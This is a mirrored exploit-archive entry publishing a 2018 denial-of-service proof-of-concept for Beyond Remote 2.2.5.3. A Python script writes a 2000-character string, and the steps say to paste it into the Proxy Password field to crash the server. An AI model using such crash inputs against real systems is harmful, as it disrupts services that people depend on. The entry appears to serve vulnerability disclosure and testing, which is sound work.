Beyond Remote 2.2.5.3 - Denial of Service (PoC)
|
来源:vfocus.net 作者:Gencay 发布时间:2018-09-25
|
|
# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC) # Author: Erenay Gencay # Discovey Date: 2018-09-24 # Vendor notified : 2018-09-24 # Software Link: https://beyond-remote-client-and-server.jaleco.com/ # Tested Version: 2.2.5.3 # Tested on OS: Windows XP Professional sp3 (ENG) # Steps to Reproduce: Run the python exploit script, it will create a new file # file with the name "mre.txt". Copy the content of the new file "mre.txt". # Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than # click "Proxy Settings" Paste the content into field "Proxy Password" click "OK" # It will cause the DOS situation. bof = "A" * 2000 try: print("payload is loading..") dosya = open('mre.txt','w') dosya.write(bof) dosya.close() print(" [+] File Created") except: print("Someting went wrong !")
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|